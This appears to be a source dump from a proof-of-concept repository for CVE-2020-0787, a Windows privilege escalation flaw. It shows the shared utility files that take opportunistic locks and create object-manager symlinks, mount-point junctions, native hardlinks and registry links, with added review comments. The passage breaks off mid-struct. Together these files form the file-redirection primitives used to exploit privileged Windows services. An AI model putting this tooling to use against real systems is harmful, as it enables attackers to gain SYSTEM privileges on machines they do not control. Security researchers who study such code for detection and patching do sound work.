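    g_inputBuffer({ 0 }), g_outputBuffer({ 0 }), g_o({ 0 }), g_hFile(INVALID_HANDLE_VALUE), g_hLockCompleted(nullptr), g_wait(nullptr), _cb(cb)
{
    g_inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    g_inputBuffer.StructureLength = sizeof(g_inputBuffer);
    // Used by the non-exclusive path (FSCTL_REQUEST_OPLOCK): read + handle caching level.
    g_inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
    g_inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
    g_outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    g_outputBuffer.StructureLength = sizeof(g_outputBuffer);
}

/// Releases the thread-pool wait, both events and the file handle.
/// NOTE(review): a callback already running on the pool thread is not waited for here;
/// it may still touch g_hFile / g_hLockCompleted — confirm callers destroy only after WaitForLock().
FileOpLock::~FileOpLock()
{
    if (g_wait)
    {
        // Clearing the wait first stops further callbacks from being queued.
        SetThreadpoolWait(g_wait, nullptr, nullptr);
        CloseThreadpoolWait(g_wait);
        g_wait = nullptr;
    }

    if (g_o.hEvent)
    {
        CloseHandle(g_o.hEvent);
        g_o.hEvent = nullptr;
    }

    // The completion event created in BeginLock() was never closed before (handle leak).
    if (g_hLockCompleted)
    {
        CloseHandle(g_hLockCompleted);
        g_hLockCompleted = nullptr;
    }

    if (g_hFile != INVALID_HANDLE_VALUE)
    {
        CloseHandle(g_hFile);
        g_hFile = INVALID_HANDLE_VALUE;
    }
}

/// Opens `filename` and issues the overlapped oplock request.
/// @param filename     File or directory to lock.
/// @param dwShareMode  FILE_SHARE_* flags for the open.
/// @param exclusive    true: FSCTL_REQUEST_OPLOCK_LEVEL_1; false: FSCTL_REQUEST_OPLOCK with
///                     the levels prepared in the constructor.
/// @return true when the request is pending (the oplock is held). On false the handles
///         opened so far are left for the destructor to close.
bool FileOpLock::BeginLock(const std::wstring& filename, DWORD dwShareMode, bool exclusive)
{
    g_hLockCompleted = CreateEvent(nullptr, TRUE, FALSE, nullptr);
    g_o.hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr);
    if (g_hLockCompleted == nullptr || g_o.hEvent == nullptr)
    {
        DebugPrintf("Error creating event %d\n", GetLastError());
        return false;
    }

    DWORD flags = FILE_FLAG_OVERLAPPED;

    // INVALID_FILE_ATTRIBUTES has every bit set, so a bare `& FILE_ATTRIBUTE_DIRECTORY`
    // test would treat a failed query as a directory; only trust a successful query.
    DWORD attrs = GetFileAttributesW(filename.c_str());
    if (attrs != INVALID_FILE_ATTRIBUTES && (attrs & FILE_ATTRIBUTE_DIRECTORY))
    {
        flags |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT;
    }

    g_hFile = CreateFileW(filename.c_str(), GENERIC_READ,
        dwShareMode, nullptr, OPEN_EXISTING,
        flags, nullptr);
    if (g_hFile == INVALID_HANDLE_VALUE)
    {
        DebugPrintf("Error opening file: %d\n", GetLastError());
        return false;
    }

    g_wait = CreateThreadpoolWait(WaitCallback, this, nullptr);
    if (g_wait == nullptr)
    {
        DebugPrintf("Error creating threadpool %d\n", GetLastError());
        return false;
    }

    // WaitCallback runs once g_o.hEvent is signalled, i.e. when the FSCTL completes.
    SetThreadpoolWait(g_wait, g_o.hEvent, nullptr);

    DWORD bytesReturned = 0;
    BOOL issued;
    if (exclusive)
    {
        issued = DeviceIoControl(g_hFile,
            FSCTL_REQUEST_OPLOCK_LEVEL_1,
            nullptr, 0,
            nullptr, 0,
            &bytesReturned,
            &g_o);
    }
    else
    {
        issued = DeviceIoControl(g_hFile, FSCTL_REQUEST_OPLOCK,
            &g_inputBuffer, sizeof(g_inputBuffer),
            &g_outputBuffer, sizeof(g_outputBuffer),
            nullptr, &g_o);
    }

    // An overlapped oplock request is expected to stay pending until the lock breaks.
    // Only read GetLastError() when the call actually failed, so a stale value from an
    // earlier call cannot be mistaken for ERROR_IO_PENDING.
    DWORD err = issued ? ERROR_SUCCESS : GetLastError();
    if (err != ERROR_IO_PENDING)
    {
        DebugPrintf("Oplock Failed %d\n", err);
        return false;
    }

    return true;
}

/// Factory: parses `share_mode` and takes the oplock.
/// @param name        File or directory to lock.
/// @param share_mode  Flag characters: 'r' FILE_SHARE_READ, 'w' FILE_SHARE_WRITE,
///                    'd' FILE_SHARE_DELETE, 'x' request an exclusive level-1 oplock.
/// @param cb          Callback run when the lock breaks (may be nullptr).
/// @return An owning raw pointer the caller must delete, or nullptr if the lock failed.
FileOpLock* FileOpLock::CreateLock(const std::wstring& name, const std::wstring& share_mode, FileOpLock::UserCallback cb)
{
    DWORD dwShareMode = 0;
    if (share_mode.find(L'r') != std::wstring::npos)
    {
        dwShareMode |= FILE_SHARE_READ;
    }
    if (share_mode.find(L'w') != std::wstring::npos)
    {
        dwShareMode |= FILE_SHARE_WRITE;
    }
    if (share_mode.find(L'd') != std::wstring::npos)
    {
        dwShareMode |= FILE_SHARE_DELETE;
    }
    const bool exclusive = share_mode.find(L'x') != std::wstring::npos;

    FileOpLock* ret = new FileOpLock(cb);
    if (!ret->BeginLock(name, dwShareMode, exclusive))
    {
        delete ret;  // destructor closes whatever BeginLock managed to open
        return nullptr;
    }
    return ret;
}

/// Blocks until DoWaitCallback() has finished or `Timeout` milliseconds elapse.
/// A timeout is not reported to the caller.
void FileOpLock::WaitForLock(UINT Timeout)
{
    WaitForSingleObject(g_hLockCompleted, Timeout);
}

/// Thread-pool trampoline: `Parameter` is the FileOpLock* passed to CreateThreadpoolWait.
void FileOpLock::WaitCallback(PTP_CALLBACK_INSTANCE Instance,
    PVOID Parameter, PTP_WAIT Wait,
    TP_WAIT_RESULT WaitResult)
{
    UNREFERENCED_PARAMETER(Instance);
    UNREFERENCED_PARAMETER(Wait);
    UNREFERENCED_PARAMETER(WaitResult);

    // PVOID -> object pointer is a plain static_cast; no reinterpret_cast needed.
    FileOpLock* lock = static_cast<FileOpLock*>(Parameter);
    lock->DoWaitCallback();
}

/// Runs on the pool thread once the oplock request completes (the lock was broken):
/// reports the FSCTL result, invokes the user callback, closes the file handle (which
/// releases the oplock) and signals WaitForLock().
void FileOpLock::DoWaitCallback()
{
    DWORD dwBytes = 0;
    if (!GetOverlappedResult(g_hFile, &g_o, &dwBytes, TRUE))
    {
        DebugPrintf("Oplock Failed\n");
    }

    if (_cb)
    {
        _cb();
    }

    //DebugPrintf("Closing Handle\n");
    CloseHandle(g_hFile);
    g_hFile = INVALID_HANDLE_VALUE;
    SetEvent(g_hLockCompleted);
}
// --------------------------------------------------------------------------------
// /CVE-2020-0787_CNA/CommonUtils/FileOpLock.h:
// --------------------------------------------------------------------------------
#pragma once

#include // <header name lost in page extraction>
#include // <header name lost in page extraction>

/// Holds an opportunistic lock on a file or directory and runs a callback when it breaks.
/// Create through CreateLock(); the returned pointer is owned by the caller.
class FileOpLock
{
public:
    typedef void(*UserCallback)();

    /// share_mode flag characters: 'r' read, 'w' write, 'd' delete sharing; 'x' exclusive
    /// level-1 oplock. Returns nullptr if the open or the oplock request fails.
    static FileOpLock* CreateLock(const std::wstring& name, const std::wstring& share_mode, FileOpLock::UserCallback cb);
    /// Waits up to Timeout ms for the lock to break and the callback to finish.
    void WaitForLock(UINT Timeout);

    ~FileOpLock();
private:

    HANDLE g_hFile;                              // file the oplock is held on; closed when it breaks
    OVERLAPPED g_o;                              // overlapped state of the FSCTL; hEvent fires on completion
    REQUEST_OPLOCK_INPUT_BUFFER g_inputBuffer;   // request for the non-exclusive path
    REQUEST_OPLOCK_OUTPUT_BUFFER g_outputBuffer; // response for the non-exclusive path
    HANDLE g_hLockCompleted;                     // manual-reset event set at the end of DoWaitCallback()
    PTP_WAIT g_wait;                             // thread-pool wait bound to g_o.hEvent
    UserCallback _cb;                            // user callback, may be nullptr

    FileOpLock(UserCallback cb);

    static void CALLBACK WaitCallback(PTP_CALLBACK_INSTANCE Instance,
        PVOID Parameter, PTP_WAIT Wait,
        TP_WAIT_RESULT WaitResult);

    void DoWaitCallback();

    bool BeginLock(const std::wstring& name, DWORD dwShareMode, bool exclusive);

};
// --------------------------------------------------------------------------------
// /CVE-2020-0787_CNA/CommonUtils/FileSymlink.cpp:
// --------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.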
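// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#include "stdafx.h"
#include "FileSymlink.h"

#include <vector>
#include "ReparsePoint.h"
#include "CommonUtils.h"

// A `permanent` link is made with DefineDosDevice and deliberately outlives
// this object; a non-permanent one is an object-manager symlink handle plus
// (for Win32 paths) a mount-point directory, both torn down in the destructor.
FileSymlink::FileSymlink(bool permanent)
    : m_created_junction(false), m_hlink(nullptr), m_permanent(permanent)
{
}

FileSymlink::FileSymlink() : FileSymlink(false)
{
}

FileSymlink::~FileSymlink()
{
    if (!m_permanent)
    {
        if (m_hlink)
        {
            CloseHandle(m_hlink);
        }

        if (m_created_junction)
        {
            RemoveDirectory(m_junctiondir);
        }
    }
}

// Resolves `name` for the object manager. A leading '@' marks an already
// native path (returned without the '@', *isnative = TRUE); anything else is
// treated as a Win32 path and expanded with GetFullPathNameW. Returns L"" on
// failure, including when the expanded path would not fit the buffer.
bstr_t GetNativePath(LPCWSTR name, PBOOL isnative)
{
    if (name[0] == '@')
    {
        *isnative = TRUE;
        return name + 1;
    }
    else
    {
        *isnative = FALSE;
        std::vector<WCHAR> buf(32 * 1024);

        // A result >= the buffer size means GetFullPathNameW returned the
        // required length instead of a path; the original treated that as success.
        DWORD len = GetFullPathNameW(name, static_cast<DWORD>(buf.size()), buf.data(), nullptr);
        if (len == 0 || len >= buf.size())
        {
            return L"";
        }

        return buf.data();
    }
}

FileSymlink::FileSymlink(FileSymlink&& other)
    : m_junctiondir(other.m_junctiondir),
      m_linkname(other.m_linkname),
      m_target(other.m_target),
      m_created_junction(other.m_created_junction),
      m_hlink(other.m_hlink),
      m_permanent(other.m_permanent)   // was left uninitialized by the original
{
    // `other` keeps its names but owns nothing, so its destructor is a no-op.
    other.m_created_junction = false;
    other.m_hlink = nullptr;
}

FileSymlink& FileSymlink::operator=(FileSymlink&& other)
{
    if (this != &other)
    {
        // Release what this instance currently owns before taking over
        // `other`'s state; the original overwrote it and leaked.
        if (!m_permanent)
        {
            if (m_hlink)
            {
                CloseHandle(m_hlink);
            }
            if (m_created_junction)
            {
                RemoveDirectory(m_junctiondir);
            }
        }

        m_created_junction = other.m_created_junction;
        m_hlink = other.m_hlink;
        m_junctiondir = other.m_junctiondir;
        m_linkname = other.m_linkname;
        m_target = other.m_target;
        m_permanent = other.m_permanent;

        other.m_created_junction = false;
        other.m_hlink = nullptr;
    }

    return *this;
}

// NOTE(review): both DefineDosDevice helpers issue the same call twice on
// purpose in the original source; the reason is not recorded here, so keep
// both calls until confirmed.
static void RemovePermanentSymlink(LPCWSTR symlink, LPCWSTR target)
{
    DefineDosDeviceW(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION |
        DDD_EXACT_MATCH_ON_REMOVE, symlink, target);
    DefineDosDeviceW(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION |
        DDD_EXACT_MATCH_ON_REMOVE, symlink, target);
}

// A permanent link is not tied to any handle, so it survives process exit;
// anyone cleaning up after this tool must call RemovePermanentSymlink.
static bool CreatePermanentSymlink(LPCWSTR symlink, LPCWSTR target)
{
    // Explicit W variant for consistency with RemovePermanentSymlink.
    return DefineDosDeviceW(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, symlink, target)
        && DefineDosDeviceW(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, symlink, target);
}

// Creates the link `xsymlink` -> `xtarget`. Either argument may be a native
// path ('@' prefix) or a Win32 path. For a Win32 link path, the directory part
// is turned into a mount point onto `xbaseobjdir` (default "\RPC Control")
// and the symlink object is created inside that object directory under the
// file-name part. Returns false (after a debug message where one exists) on
// any failure; partial state is released by the destructor.
bool FileSymlink::CreateSymlink(LPCWSTR xsymlink, LPCWSTR xtarget, LPCWSTR xbaseobjdir)
{
    bstr_t symlink = xsymlink;
    bstr_t baseobjdir = L"\\RPC Control";

    if (xbaseobjdir)
    {
        baseobjdir = xbaseobjdir;
    }

    BOOL isnative;

    bstr_t linkname = GetNativePath(symlink, &isnative);
    if (linkname.length() == 0)
    {
        // Was `return 1;`, i.e. reported success when the path could not be resolved.
        return false;
    }

    if (!isnative)
    {
        wchar_t* slash = wcsrchr(symlink.GetBSTR(), L'\\');
        if (slash == nullptr)
        {
            DebugPrintf("Error must supply a directory and link name\n");
            return false;
        }

        // `slash` still carries its leading backslash: "<baseobjdir>\<name>".
        linkname = baseobjdir + slash;

        *slash = 0;   // truncate `symlink` to its directory part

        m_junctiondir = symlink;

        if (!CreateDirectory(m_junctiondir, nullptr) && GetLastError() != ERROR_ALREADY_EXISTS)
        {
            DebugPrintf("Couldn't create symlink directory\n");
            return false;
        }

        bstr_t destdir = baseobjdir;

        if (!ReparsePoint::CreateMountPoint(m_junctiondir.GetBSTR(), destdir.GetBSTR(), L""))
        {
            DebugPrintf("Error creating junction %d\n", ReparsePoint::GetLastError());
            return false;
        }

        m_created_junction = true;
    }

    bstr_t target = GetNativePath(xtarget, &isnative);
    if (target.length() == 0)
    {
        return false;
    }

    if (!isnative)
    {
        // Win32 paths are reached through the \??\ device directory.
        target = L"\\??\\" + target;
    }

    if (m_permanent)
    {
        linkname = L"Global\\GLOBALROOT" + linkname;

        if (!CreatePermanentSymlink(linkname, target))
        {
            DebugPrintf("Error creating symlink %ls\n", GetErrorMessage().c_str());
            return false;
        }
    }
    else
    {
        m_hlink = ::CreateSymlink(nullptr, linkname, target);
        if (!m_hlink)
        {
            return false;
        }
    }

    m_linkname = linkname;
    m_target = target;

    return true;
}


// Repoints an existing link at `newtarget`. For a permanent link the old
// definition is removed before the new one is created, so on failure the link
// may be gone while m_target still names the old target.
bool FileSymlink::ChangeSymlink(LPCWSTR newtarget)
{
    BOOL isnative;

    bstr_t target = GetNativePath(newtarget, &isnative);
    if (target.length() == 0)
    {
        return false;
    }

    if (!isnative)
    {
        target = L"\\??\\" + target;
    }

    if (m_permanent)
    {
        RemovePermanentSymlink(m_linkname, m_target);
        if (!CreatePermanentSymlink(m_linkname, target))
        {
            return false;
        }
    }
    else
    {
        if (!m_hlink)
        {
            SetLastError(ERROR_INVALID_PARAMETER);
            return false;
        }

        // Closing the handle drops the old link object before re-creating it.
        CloseHandle(m_hlink);
        m_hlink = nullptr;

        m_hlink = ::CreateSymlink(nullptr, m_linkname, target);
        if (!m_hlink)
        {
            return false;
        }
    }

    m_target = target;

    return true;
}
--------------------------------------------------------------------------------
/CVE-2020-0787_CNA/CommonUtils/FileSymlink.h:
--------------------------------------------------------------------------------
#pragma once
#include <comdef.h>

// RAII owner of a file-system symlink built from object-manager primitives:
// a mount point from a Win32 directory into an object directory plus a
// symlink object inside it (see FileSymlink::CreateSymlink). Move-only.
// Detection note: a mount point whose target is an object-manager directory
// rather than a file-system path is characteristic of this construction.
class FileSymlink
{
    bstr_t m_junctiondir;      // directory we turned into a mount point
    bstr_t m_linkname;         // native name of the symlink object
    bstr_t m_target;           // native target path
    bool m_created_junction;   // true once m_junctiondir must be removed by us
    HANDLE m_hlink;            // symlink object handle (non-permanent only)
    bool m_permanent;          // DefineDosDevice link that outlives the object

public:
    explicit FileSymlink(bool permanent);
    FileSymlink();
    FileSymlink(FileSymlink&& other);
    FileSymlink& operator=(FileSymlink&& other);
    FileSymlink(const FileSymlink& other) = delete;
    FileSymlink& operator=(const FileSymlink& other) = delete;

    bool CreateSymlink(LPCWSTR symlink, LPCWSTR target, LPCWSTR baseobjdir);
    bool ChangeSymlink(LPCWSTR newtarget);

    ~FileSymlink();
};

--------------------------------------------------------------------------------
/CVE-2020-0787_CNA/CommonUtils/Hardlink.cpp:
--------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.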
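#include "stdafx.h"
#include "CommonUtils.h"
#include "ntimports.h"
#include "typed_buffer.h"

// Creates a hard link `linkname` -> `targetname` with
// ZwSetInformationFile(FileLinkInformation) instead of the Win32
// CreateHardLink API. Returns false on failure; the thread's last error is
// set from the NTSTATUS when the set-information call is what failed.
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname)
{
    std::wstring full_linkname = BuildFullPath(linkname, true);
    size_t len = full_linkname.size() * sizeof(WCHAR);

    // FILE_LINK_INFORMATION ends in FileName[1]; size it for the real name.
    typed_buffer_ptr<FILE_LINK_INFORMATION> link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR));

    memcpy(&link_info->FileName[0], full_linkname.c_str(), len);
    link_info->ReplaceIfExists = TRUE;
    // RootDirectory is never set: presumably typed_buffer_ptr zero-fills, so
    // the name is taken as absolute — confirm in typed_buffer.h.
    link_info->FileNameLength = static_cast<ULONG>(len);

    std::wstring full_targetname = BuildFullPath(targetname, true);

    HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0);
    // NOTE(review): assumes OpenFileNative yields nullptr, not
    // INVALID_HANDLE_VALUE, on failure — confirm in CommonUtils.cpp.
    if (hFile)
    {
        DEFINE_NTDLL(ZwSetInformationFile);
        IO_STATUS_BLOCK io_status = { 0 };

        NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, static_cast<ULONG>(link_info.size()), FileLinkInformation);
        CloseHandle(hFile);
        if (NT_SUCCESS(status))
        {
            return true;
        }
        SetNtLastError(status);
    }

    return false;
}
--------------------------------------------------------------------------------
/CVE-2020-0787_CNA/CommonUtils/NativeSymlink.cpp:
--------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.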
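#include "stdafx.h"
#include "CommonUtils.h"
#include "ntimports.h"

// Creates an object-manager symbolic link `linkname` -> `targetname`, relative
// to the `root` directory handle when one is given, via
// NtCreateSymbolicLinkObject. Returns the link handle, or nullptr with the
// thread's last error set from the NTSTATUS. FileSymlink closes this handle
// to remove a non-permanent link, so callers must keep it alive as long as
// the link is needed.
HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname)
{
    DEFINE_NTDLL(RtlInitUnicodeString);
    DEFINE_NTDLL(NtCreateSymbolicLinkObject);

    OBJECT_ATTRIBUTES objAttr;
    UNICODE_STRING name;
    UNICODE_STRING target;

    fRtlInitUnicodeString(&name, linkname);
    fRtlInitUnicodeString(&target, targetname);

    InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);

    HANDLE hLink = nullptr;   // was uninitialized in the original

    NTSTATUS status = fNtCreateSymbolicLinkObject(&hLink,
        SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);
    // Only STATUS_SUCCESS counts; informational success codes are treated as errors.
    if (status == 0)
    {
        //DebugPrintf("Opened Link %ls -> %ls: %p\n", linkname, targetname, hLink);
        return hLink;
    }
    else
    {
        SetLastError(NtStatusToDosError(status));
        return nullptr;
    }
}

// Opens an existing symbolic link object with SYMBOLIC_LINK_ALL_ACCESS.
// Returns the handle, or nullptr with the thread's last error set.
HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname)
{
    DEFINE_NTDLL(RtlInitUnicodeString);
    DEFINE_NTDLL(NtOpenSymbolicLinkObject);

    OBJECT_ATTRIBUTES objAttr;
    UNICODE_STRING name;

    fRtlInitUnicodeString(&name, linkname);

    InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);

    HANDLE hLink = nullptr;

    NTSTATUS status = fNtOpenSymbolicLinkObject(&hLink,
        SYMBOLIC_LINK_ALL_ACCESS, &objAttr);
    if (status == 0)
    {
        return hLink;
    }
    else
    {
        SetLastError(NtStatusToDosError(status));
        return nullptr;
    }
}
--------------------------------------------------------------------------------
/CVE-2020-0787_CNA/CommonUtils/RegistrySymlink.cpp:
--------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.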
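// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#include "stdafx.h"
#include <Windows.h>
#include <winternl.h>
#include <sddl.h>
#include <vector>
#include "CommonUtils.h"

// Option bits for NtCreateKey / NtOpenKeyEx that are not in the public SDK.
#define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
#define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)

typedef NTSTATUS(__stdcall *fNtCreateKey)(
    PHANDLE KeyHandle,
    ULONG DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    ULONG TitleIndex,
    PUNICODE_STRING Class,
    ULONG CreateOptions,
    PULONG Disposition
    );

typedef NTSTATUS (__stdcall *fNtOpenKeyEx)(
    PHANDLE KeyHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    ULONG OpenOptions
    );


typedef NTSTATUS(__stdcall *fNtSetValueKey)(
    HANDLE KeyHandle,
    PUNICODE_STRING ValueName,
    ULONG TitleIndex,
    ULONG Type,
    PVOID Data,
    ULONG DataSize
    );

typedef NTSTATUS(__stdcall *fNtDeleteKey)(
    HANDLE KeyHandle
    );

typedef NTSTATUS(__stdcall *fNtClose)(
    HANDLE Handle
    );

FARPROC GetProcAddressNT(LPCSTR lpName);

typedef VOID(NTAPI *fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);

// Returns the current process token's user SID as a string (used to expand
// HKCU), or L"" if any step fails. The original left every call unchecked and
// never closed the token handle.
static bstr_t GetUserSid()
{
    bstr_t ret = L"";
    HANDLE hToken = nullptr;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
    {
        return ret;
    }

    DWORD dwSize = 0;
    // Sizing call: expected to fail with the required length in dwSize.
    GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);

    if (dwSize != 0)
    {
        std::vector<BYTE> userbuffer(dwSize);

        if (GetTokenInformation(hToken, TokenUser, &userbuffer[0], dwSize, &dwSize))
        {
            PTOKEN_USER user = reinterpret_cast<PTOKEN_USER>(&userbuffer[0]);
            LPWSTR lpUser = nullptr;

            if (ConvertSidToStringSid(user->User.Sid, &lpUser))
            {
                ret = lpUser;
                LocalFree(lpUser);
            }
        }
    }

    CloseHandle(hToken);
    return ret;
}

// Maps the HKLM\, HKU\ and HKCU\ prefixes (case-insensitive) onto native
// \Registry\... paths; a path already starting with '\' is returned as-is.
// Anything else is rejected with a debug message and L"".
static bstr_t RegPathToNative(LPCWSTR lpPath)
{
    bstr_t regpath = L"\\Registry\\";

    // Already native rooted
    if (lpPath[0] == '\\')
    {
        return lpPath;
    }

    if (_wcsnicmp(lpPath, L"HKLM\\", 5) == 0)
    {
        return regpath + L"Machine\\" + &lpPath[5];
    }
    else if (_wcsnicmp(lpPath, L"HKU\\", 4) == 0)
    {
        return regpath + L"User\\" + &lpPath[4];
    }
    else if (_wcsnicmp(lpPath, L"HKCU\\", 5) == 0)
    {
        bstr_t sid = GetUserSid();
        if (sid.length() == 0)
        {
            // Without the SID the HKCU path cannot be expanded correctly.
            return L"";
        }
        return regpath + L"User\\" + sid + L"\\" + &lpPath[5];
    }
    else
    {
        // The original omitted the %ls argument and printed stack garbage.
        DebugPrintf("Registry path %ls must be absolute or start with HKLM, HKU or HKCU\n", lpPath);
        return L"";
    }
}

// Creates the registry symbolic link `lpSymlink` -> `lpTarget` (both accepted
// in the forms RegPathToNative understands). `bVolatile` selects a link that
// disappears at reboot. Returns false with the thread's last error set on
// failure. Only STATUS_SUCCESS is treated as success, as in the original.
bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile)
{
    bstr_t symlink = RegPathToNative(lpSymlink);
    bstr_t target = RegPathToNative(lpTarget);

    if (symlink.length() == 0 || target.length() == 0)
    {
        return false;
    }

    DebugPrintf("Creating registry link from %ls to %ls\n", symlink.GetBSTR(), target.GetBSTR());

    fNtCreateKey pfNtCreateKey = (fNtCreateKey)GetProcAddressNT("NtCreateKey");
    fNtSetValueKey pfNtSetValueKey = (fNtSetValueKey)GetProcAddressNT("NtSetValueKey");
    fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT("RtlInitUnicodeString");

    if (!pfNtCreateKey || !pfNtSetValueKey || !pfRtlInitUnicodeString)
    {
        // The original called through a null pointer if any export was missing.
        SetLastError(ERROR_PROC_NOT_FOUND);
        return false;
    }

    OBJECT_ATTRIBUTES obj_attr;
    UNICODE_STRING name;

    pfRtlInitUnicodeString(&name, symlink);
    InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
    HANDLE hKey = nullptr;
    ULONG disposition = 0;

    NTSTATUS status = pfNtCreateKey(&hKey, KEY_ALL_ACCESS, &obj_attr, 0, nullptr,
        INTERNAL_REG_OPTION_CREATE_LINK | (bVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE), &disposition);

    if (status == 0)
    {
        UNICODE_STRING value_name;

        // A link key is just a key whose SymbolicLinkValue (REG_LINK) names the target.
        pfRtlInitUnicodeString(&value_name, L"SymbolicLinkValue");

        status = pfNtSetValueKey(hKey, &value_name, 0, REG_LINK, target.GetBSTR(), static_cast<ULONG>(target.length() * sizeof(WCHAR)));
        CloseHandle(hKey);

        if (status != 0)
        {
            SetLastError(NtStatusToDosError(status));
            return false;
        }
    }
    else
    {
        SetLastError(NtStatusToDosError(status));
        return false;
    }

    return true;
}

// Deletes the registry link `lpSymlink` itself (OBJ_OPENLINK opens the link
// key rather than following it). Returns false with the thread's last error set.
bool DeleteRegSymlink(LPCWSTR lpSymlink)
{
    fNtOpenKeyEx pfNtOpenKeyEx = (fNtOpenKeyEx)GetProcAddressNT("NtOpenKeyEx");
    fNtDeleteKey pfNtDeleteKey = (fNtDeleteKey)GetProcAddressNT("NtDeleteKey");
    fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT("RtlInitUnicodeString");

    if (!pfNtOpenKeyEx || !pfNtDeleteKey || !pfRtlInitUnicodeString)
    {
        SetLastError(ERROR_PROC_NOT_FOUND);
        return false;
    }

    OBJECT_ATTRIBUTES obj_attr;
    UNICODE_STRING name;

    bstr_t symlink = RegPathToNative(lpSymlink);

    if (symlink.length() == 0)
    {
        return false;
    }

    pfRtlInitUnicodeString(&name, symlink);

    InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);

    HANDLE hKey = nullptr;
    NTSTATUS status = pfNtOpenKeyEx(&hKey, DELETE, &obj_attr, 0);
    if (status == 0)
    {
        status = pfNtDeleteKey(hKey);
        CloseHandle(hKey);

        if (status != 0)
        {
            SetLastError(NtStatusToDosError(status));
            return false;
        }
    }
    else
    {
        SetLastError(NtStatusToDosError(status));

        return false;
    }

    return true;
}
--------------------------------------------------------------------------------
/CVE-2020-0787_CNA/CommonUtils/ReparsePoint.cpp: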
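--------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#include "stdafx.h"
#include "ReparsePoint.h"
#include "ScopedHandle.h"
#include "typed_buffer.h"
#include <string>
#include <vector>

// Taken from ntifs.h
#define SYMLINK_FLAG_RELATIVE 1

// On-disk layout of reparse data (ntifs.h). Offsets/lengths inside the
// per-tag structs are in bytes and index into the WCHAR PathBuffer.
typedef struct _REPARSE_DATA_BUFFER {
    ULONG ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    union {
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            ULONG Flags;
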